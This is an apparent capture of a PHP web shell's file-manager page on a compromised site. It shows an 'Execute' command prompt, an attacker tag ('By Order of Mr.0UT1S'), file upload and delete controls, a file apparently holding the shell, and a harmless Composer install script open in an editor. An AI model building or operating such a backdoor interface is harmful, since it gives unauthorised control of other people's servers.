home
/
aioutajg
/
test.imgccr.com
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] Before Install
N/A
[DIR] composer_home
N/A
[DIR] vendor
N/A
0u.php
37.68 KB
Rename
Delete
1.install.php
1.69 KB
Rename
Delete
2.run_composer.php
643 bytes
Rename
Delete
Before Install.zip
3.10 KB
Rename
Delete
composer.json
67 bytes
Rename
Delete
composer.lock
46.59 KB
Rename
Delete
composer.phar
2.92 MB
Rename
Delete
index.php
773 bytes
Rename
Delete
robots.txt
26 bytes
Rename
Delete
upload.php
2.36 KB
Rename
Delete
<?php // Path to Composer $composerPath = __DIR__ . '/composer.phar'; // Create a COMPOSER_HOME directory if it doesn't exist $composerHome = __DIR__ . '/composer_home'; if (!file_exists($composerHome)) { mkdir($composerHome, 0700); } // Set COMPOSER_HOME environment variable putenv('COMPOSER_HOME=' . $composerHome); // Command to run Composer with verbose output $command = "php $composerPath install -vvv"; // Execute the command exec($command . ' 2>&1', $output, $returnVar); // Output the result echo "Command executed with return code: $returnVar\n"; echo "Output:\n" . implode("\n", $output) . "\n"; ?>
Save